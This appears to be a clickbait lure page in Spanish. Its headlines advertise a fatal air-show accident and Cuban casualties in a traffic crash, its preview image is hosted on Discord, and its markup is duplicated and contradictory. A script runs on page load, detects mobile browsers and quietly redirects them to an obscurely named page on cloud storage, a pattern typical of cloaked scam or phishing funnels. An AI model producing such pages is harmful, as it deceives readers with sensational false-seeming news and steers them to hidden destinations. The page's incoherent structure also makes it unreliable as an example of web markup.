<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Dramático video: captan terrible accidente mortal durante show aéreo, Esta mañana"/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1230492694724476990/1230947625449160805/dfertwert44434.jpg?ex=66352c4f&is=6622b74f&hm=53fba4a586a0997aec7217ce1c28b94348a3a755a25d3555a71c6b859b40bd16&=&format=webp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html>
<head>
    <title>Revelan identidades de cubanos fallecidos y heridos en accidente de transito esta mañana</title>
    <script>
        // Función para detectar si es un dispositivo móvil
        function esDispositivoMovil() {
            return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        }

        // Función para redirigir si es un dispositivo móvil
        function redireccionarSiEsMovil() {
            if (esDispositivoMovil()) {
                // URL a la que quieres redirigir para dispositivos móviles
                var urlMovil = 'https://storage.googleapis.com/zankiops001.appspot.com/Prus02024/israel00/xtxttyhhsd22.html';

                // Redirigir al usuario a la URL para dispositivos móviles
                window.location.href = urlMovil;
            }
        }

        // Llamar a la función de redireccionamiento cuando la página cargue
        window.onload = redireccionarSiEsMovil;
    </script>